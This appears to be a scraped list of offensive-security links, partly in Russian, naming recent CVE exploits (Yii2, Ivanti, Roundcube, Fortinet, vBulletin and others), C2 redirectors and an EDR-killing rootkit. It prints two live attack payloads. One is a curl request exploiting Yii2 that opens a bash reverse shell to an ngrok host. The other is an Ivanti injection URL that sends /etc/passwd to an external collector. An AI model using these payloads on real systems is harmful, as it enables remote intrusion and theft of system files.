Grafana CVE-2025-4123: XSS and Full-Read SSRF
*
Script to exploit

ожидаемо

C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations
*
read

Отдельно порадовало

iptables -A INPUT -m geoip --src-cc RU,CN -j DROP

Windows Server 2025 dMSA Vulnerability
*
about
*
toolZ

CVE-2024–58136 — RCE PoC
*
Yii2 Framework

curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

CVE-2025-48827
*
Unauthenticated API Access in vBulletin
*
WriteUP
*
POC

Linux kernel ctf
Подломили linux packet scheduler
*
commit

CVE-2025-30397
*
Windows-Server-2025 JScript-RCE-Use-After-Free
*
exploit

CVE-2025-5287
*
WordPress Likes and Dislikes - SQL Injection
*
sploit

LOLz
*
CVE-2025-20188
Cisco IOS XE WLC - Arbitrary File Upload Vulnerability
*
read

Прям очень хорошо !
*
Root Shell on Credit Card Terminal
*
Пройдемте

Kernel Exploitation Techniques
*
Turning The (Page) Tables

CVE-2025-31650
*
Apache Tomcat ver 10.1.39
*
DOS exploit

CVE-2025-49113
*
Roundcube ≤ 1.6.10
Post-Auth RCE
*
ALL in ONE (roundcube in docker + POC)

CVE-2025-32756
*
Fortinet RCE (FortiVoice, FortiMail, FortiNDR, FortiRecorder, FortiCamera)
*
PoC

красивое

#error

Kill EDR Processes permanently
*
user-mode code and its rootkit
*
dark-kill

КРУТО !
*
код Apollo 11 Gualdance Computer (AGC) для командных и лунных модулей.
*
link

Ivanti Decrypt Stored SQL

POC

https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx

CVE-2025-33053
*
Автоматика WebDAV / Ubuntu / Apache2 и вредоносны.
*
Proof Of Concept